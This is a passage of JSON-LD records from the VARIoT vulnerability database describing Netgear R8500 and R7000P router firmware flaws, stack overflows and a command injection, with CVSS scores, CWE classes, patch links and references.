"id": "CVE-2024-50997"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-50997",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023438",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"id": "VAR-202411-2043",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-09T03:02:44.331000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_43/43.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-50997"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"date": "2024-11-05T15:15:23.783000",
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-08T00:36:00",
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"date": "2025-05-01T18:22:26.830000",
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
}
],
"trust": 0.8
}
}
VAR-202411-0626
Vulnerability from variot - Updated: 2025-05-09 02:56Netgear R8500 v1.0.2.160 was discovered to contain a stack overflow via the ipv6_pri_dns parameter at ipv6_fix.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of the ipv6_pri_dns parameter in the ipv6_fix.cgi component to properly verify the length of the input data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-0626",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"cve": "CVE-2024-51012",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-44812",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51012",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-023357",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51012",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023357",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2024-44812",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a stack overflow via the ipv6_pri_dns parameter at ipv6_fix.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of the ipv6_pri_dns parameter in the ipv6_fix.cgi component to properly verify the length of the input data",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51012"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "CNVD",
"id": "CNVD-2024-44812"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51012",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-44812",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"id": "VAR-202411-0626",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
}
]
},
"last_update_date": "2025-05-09T02:56:34.708000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 ipv6_fix.cgi component ipv6_pri_dns parameter buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612611"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51012"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_45/45.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"date": "2025-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"date": "2024-11-05T15:15:25.057000",
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44812"
},
{
"date": "2025-05-07T06:49:00",
"db": "JVNDB",
"id": "JVNDB-2024-023357"
},
{
"date": "2025-05-02T15:39:37.007000",
"db": "NVD",
"id": "CVE-2024-51012"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 Classic buffer overflow vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023357"
}
],
"trust": 0.8
}
}
VAR-202411-1028
Vulnerability from variot - Updated: 2025-05-09 02:52Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the share_name parameter at usb_remote_smb_conf.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of share_name in the usb_remote_smb_conf.cgi component to properly filter special characters and commands in constructing commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-1028",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"cve": "CVE-2024-51005",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.7,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-45305",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51005",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-023256",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51005",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023256",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2024-45305",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the share_name parameter at usb_remote_smb_conf.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of share_name in the usb_remote_smb_conf.cgi component to properly filter special characters and commands in constructing commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51005"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "CNVD",
"id": "CNVD-2024-45305"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51005",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-45305",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"id": "VAR-202411-1028",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
}
]
},
"last_update_date": "2025-05-09T02:52:10.411000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 usb_remote_smb_conf.cgi component command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612641"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51005"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_50/50.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"date": "2025-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"date": "2024-11-05T15:15:24.470000",
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45305"
},
{
"date": "2025-05-07T02:13:00",
"db": "JVNDB",
"id": "JVNDB-2024-023256"
},
{
"date": "2025-05-02T15:39:33.390000",
"db": "NVD",
"id": "CVE-2024-51005"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023256"
}
],
"trust": 0.8
}
}
VAR-202411-1064
Vulnerability from variot - Updated: 2025-05-02 23:07Netgear R8500 v1.0.2.160 and R7000P v1.3.3.154 were discovered to multiple stack overflow vulnerabilities in the component usb_device.cgi via the cifs_user, read_access, and write_access parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 firmware and R7000P Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500/R7000P is a wireless router from NETGEAR. The vulnerability is caused by the failure of cifs_user, read_access, and write_access in the usb_device.cgi component to properly verify the length of the input data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-1064",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.3.3.154"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
